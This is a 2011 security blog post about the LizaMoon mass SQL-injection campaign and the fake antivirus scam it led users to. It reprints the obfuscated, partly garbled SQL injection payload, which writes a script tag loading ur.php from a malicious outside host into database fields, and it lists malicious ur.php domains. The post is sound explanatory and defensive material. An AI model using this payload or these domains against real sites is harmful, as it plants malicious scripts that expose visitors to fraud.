Home > Uncategorized > LizaMoon Is Back On The Security RADAR

LizaMoon Is Back On The Security RADAR

April 1st, 2011
LizaMoon is a Mass-Injection Attack that is not new, but is currently getting security attention again. Using Google’s security results as a weak indicator of scope and severity, LizaMoon is indicated as asignificant threat to beware. Over 1.5 million URLs have links with the same attack mechanisms as the original attack, and a half million have an included script to the lizamoon.com site, which Google has listed as harmful.
GOOGLE WARNINGS
If you browse to a website that Google has previously listed as harmful, you may see the following warning before any content is loaded.
Google Harmful Web Site Warning for LizaMoon

Google Harmful Web Site Warning for LizaMoon

You can find websites that contain injected code that have been indexed by Google using the following search link. This link is little more than a search for a section of the injected code, and will simply list some sites in a Google Search Results page.

http://www.google.com/search?client=safari&rls=en&q=%22%3Cscript+src=http://*/ur.php&ie=UTF-8&oe=UTF-8

INJECTIONS
The LizaMoon attack is performed by an Injection Attack containing Code/SQL Injections, like the sample below. You can learn more about SQL Injections, Cross-Site Scripting (XSS) and other attack methods at http://blog.emagined.com/2010/03/22/top-ten-most-critical-web-application-security-vulnerabilities/

Injection attacks can be pferformed successfully on websites that have not been sufficiently protected via methods such as Data Cleansing and Data validation. Our article on “Are My Website Forms At Risk For Being Hacked?” may provide more answers about forms and security related to server-side handling of submitted data.

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar60)%2B
char(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar115)
%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2
Bchar(5)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)
%2Bchar101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)
%2Bchar(4)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)
%2Bchar114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)
%2Bchar(11)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+
varchar(8000)),cast(char(32)+as+varchar(8)))–

THE SECURITY EXPLOIT
The LizaMoon Attack is a traditional antivirus scam (AV Scam). When your browser is redirected to the rogue site for the attack, a window may pop up indicating your computer has harmful problems that need to be repaired. Unprepared users who buy into in to the obviously bogus content will be offered false comfort with the Windows logo and a generally nice layout, indicating a professional website and store. Submitting your credit card information carries the expected caveats and downsides!

WebSense Labs Video About LizaMoon

SOME INFECTDED URLs
http://lizamoon.com/ur.php
http://tadygus.com/ur.php
http://alexblane.com/ur.php
http://alisa-carter.com/ur.php
http://online-stats201.info/ur.php
http://stats-master111.info/ur.php
http://agasi-story.info/ur.php
http://general-st.info/ur.php
http://extra-service.info/ur.php
http://t6ryt56.info/ur.php
http://sol-stats.info/ur.php
http://google-stats49.info/ur.php
http://google-stats45.info/ur.php
http://google-stats50.info/ur.php
http://stats-master88.info/ur.php
http://eva-marine.info/ur.php
http://stats-master99.info/ur.php
http://worid-of-books.com/ur.php
http://google-server43.info/ur.php
http://tzv-stats.info/ur.php
http://milapop.com/ur.php

Categories: Uncategorized Tags:
Comments are closed.